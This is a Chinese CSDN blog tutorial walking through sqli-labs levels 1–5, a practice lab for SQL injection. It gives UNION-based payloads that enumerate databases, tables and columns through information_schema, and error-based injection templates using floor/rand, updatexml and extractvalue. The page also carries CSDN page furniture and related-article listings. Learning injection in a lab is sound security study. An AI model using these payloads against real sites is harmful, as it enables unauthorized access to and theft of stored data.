sqli-labs闯关1—5(复习hhhh)

最新推荐文章于 2022-05-17 15:35:10 发布
最新推荐文章于 2022-05-17 15:35:10 发布
阅读量285 收藏
点赞数
分类专栏: ctf-web刷题之旅 web分类总结
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JURUO222/article/details/107857704
版权

参考:http://www.secist.com/archives/4880.html

文章目录

SQL注入简介

SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。(百度百科)

补充知识
  1. MySql常用注释方法:/ #(即%23) – /…/ --+
  2. 验证有多少列:用order by 判断字段数,当输入id=1’ order by 4 – #时页面回显错误,说明有3个字段;
  3. 接下来查询数据库中有哪些库
  • information_schema,他是系统数据库,安装完就有,记录是当前数据库的数据库,表,列,用户权限等信息,下面说一下常用的几个表
  • SCHEMATA表
    储存mysql所有数据库的基本信息,包括数据库名,编码类型路径等,show databases的结果取之此表。
  • TABLES表
    储存mysql中的表信息,(当然也有数据库名这一列,这样才能找到哪个数据库有哪些表嘛)包括这个表是基本表还是系统表,数据库的引擎是什么,表有多少行,创建时间,最后更新时间等。show tables from schemaname的结果取之此表
  • COLUMNS表
    提供了表中的列信息,(当然也有数据库名和表名称这两列)详细表述了某张表的所有列以及每个列的信息,包括该列是那个表中的第几列,列的数据类型,列的编码类型,列的权限,猎德注释等。是show columns from schemaname.tablename的结果取之此表。

第一关——基于错误的GET单引号字符型注入

select * from tableName limit i,n

  • tableName:表名
  • i:为查询结果的索引值(默认从0开始),当i=0时可省略i
  • n:为查询结果返回的数量
  • i与n之间使用英文逗号","隔开
爆破数据

id=1’ union select 1,group_concat(schema_name),3 from information_schema.schemata – #(爆数据库名)

  • concat()函数
    1、功能:将多个字符串连接成一个字符串。
    2、语法:concat(str1, str2,…)
  • 在有group by的查询语句中,select指定的字段要么就包含在group by语句的后面,作为分组的依据,要么就包含在聚合函数中。
    在这里插入图片描述
    表结构与数据如上
    现在的需求就是每个id为一行 在前台每行显示该id所有分数
    使用group_concat 后
    SELECT id,GROUP_CONCAT(score) FROM testgroup GROUP BY id

    返回结果为连接参数产生的字符串,如果有任何一个参数为null,则返回值为null。

id=123’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() – #(爆数据表名)

id=123’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’ – #(爆字段)

第二关——GET – Error based – Intiger based (基于错误的GET整型注入)

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

第三关——基于错误的GET单引号变形字符型注入


得出

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

第四关——基于错误的GET双引号字符型注入


确定

$sql="SELECT * FROM users WHERE id=("$id") LIMIT 0,1";

第五关——双注入GET单引号字符型注入

双查询注入详细解释
当在一个聚合函数,比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来。

  1. Rand() //随机函数
  2. Floor() //取整函数
  3. Count() //汇总函数
  4. Group by clause //分组语句

常见的报错注入

  1. 通过floor报错
    and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)
    其中payload为你要插入的SQL语句
    需要注意的是该语句将 输出字符长度限制为64个字符
  1. 通过updatexml报错
    and updatexml(1,payload,1)
    同样该语句对输出的字符长度也做了限制,其最长输出32位
    并且该语句对payload的反悔类型也做了限制,只有在payload返回的不是xml格式才会生效

3.(3). 通过ExtractValue报错
and extractvalue(1, payload)
输出字符有长度限制,最长32位。

Diana_1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs小游戏21-65.docx
10-23
这是个于sql注入的文档,是sqli-labs小游戏二十一到六十五的详解,每一的步骤写得都很详细,前二十的话我已经发布了博客,有需要的可以下载一下。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs 第一到第五
three_year的博客
10-02 490
本文是基于docker搭建sqli-labs,不知道怎么搭建的话请看Linux安装docker和配置sqli-labs Less-01 从题目的提示我们可以知道题目需要我们传递一个id的值,我们传递一个1进行尝试 可以看到显示了登录用户名和密码,接着我们对其进行判断是字符型注入还是数字型注入 经过尝试我们得到报错信息,可以得知这一题是字符型注入,使用单引号进行闭合,我们再进行对传递的参数后面的语句进行注释 这里使用的是–+进行注释,接着使用order by判断列数 经过尝试,得到列数为三列,接下来我们就可
Sqli-labs 1-5
Darklord.W
04-10 178
Sqli-labs 1-5步骤级截图说明 第一: GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) 尝试?id=1: ?id=1'--+ 其中--+为注释后面内容 该注入为单引号注入 接下来判断列数,为3列 然后通过union查询判断数据回显位置 查询库名,数据库版本 库名为securi...
Integer最大值2147483647
过客的博客
08-20 1万+
用Integer存储sina的10位数字的uid,然后出现了input错,我以为Integer存10位数字没问题啊,确实能存10位,但最大值是2147483647,超过就不行了....
sqli-labs 1-5
qq_41326328的博客
03-28 1196
这次写一个于sql注入的游戏,叫sqli-liabs,这个源码在网上搜索一下sqli-liabs源码下载,放到phpstudy环境里, 注意:这里把phpstudy版本调到5.5,别问我为什么,厂长是我的表哥 下面先说一下, 注入分为数字型注入和字符串型注入 区别: ?id=1 and 1=1 ?id=2 and 1=2 回显不一致则为数字型注入,回显一致的话再继续判断 ?di=1’ ...
详细sqli-labs(1-65)通讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs指南 1—10
18年3月萌新白帽子
06-18 5万+
如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。另外-- (这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用--+代替-- ,原因是+在URL被URL编码后会变成空格。第一1.经过语句and 1=2...
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
SQL注入篇——sqli-labs最详细1-40指南
爱国小白帽
01-11 3万+
使用sqli­labs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less­1进入第一,在网址中添加标红内容,显示了用户和密码 http://localhost/sqli­labs­master/Less­1/index.php?id=1’ and 1=1 ­­ ­ 把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入 二.进入第二,在网址中添...
sqli-labs系列——第五
茶寂的博客
01-15 2278
less5 更改id后无果,不能用union联合查询 此处用报错注入 报错注入的概念: (1). 通过floor报错 and (select 1 from (select count(*),concat(( payload),floor (rand(0)*2))x from information_schema.tables group by x)a) 其中payload为你要插入的SQL语句 需要注意的是该语句将 输出字符长度限制为64个字符 (2). 通过updatexml报错 and update
[攻防世界web]shrine
JURUO222的博客
07-31 432
参考文章1 参考文章2 SSTI(服务器模板注入) sql注入是从用户获得一个输入,然后又后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。 SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornad
web_进阶_Web_python_template_injection
JURUO222的博客
08-08 355
参考文章 #flask模板注入 flask的渲染方法有render_template和render_template_string两种。 render_template()是用来渲染一个指定的文件的。使用如下 return render_template(‘index.html’) render_template_string则是用来渲染一个字符串的。SSTI与这个方法密不可分。 使用方法如下 html = ‘This is index page’ return render_template_strin
web_进阶_NewsCenter
JURUO222的博客
08-07 328
可以通过sqlmap来爆破 在框中随便输入一个test,然后用burp抓包 将抓到的数据保存在1.txt里,用sqlmap进行爆破 Python sqlmap.py -r 1.txt --dbs 爆出数据库名 继续查询数据库news Python  sqlmap.py -r 1.txt -D news --dump ...
HCTF2018-admin
JURUO222的博客
04-02 307
参考大佬博客 这道题叫admin,一进去有登录和注册选项,可能是在暗示用admin登录 随便注册一个登录 发现源码 andmin登录成功便可获得flag flask session 伪造 flask数据库操作的框架,就只能将session存储在cookie中。因为cookie实际上是存储在客户端(浏览器)中的,所以称之为“客户端session”。 flask 新建了URLSafeTimed...
sqli-labs
10-09
很高兴为您解答sqli-labs的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs,您可以按照以下步骤进行: 1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值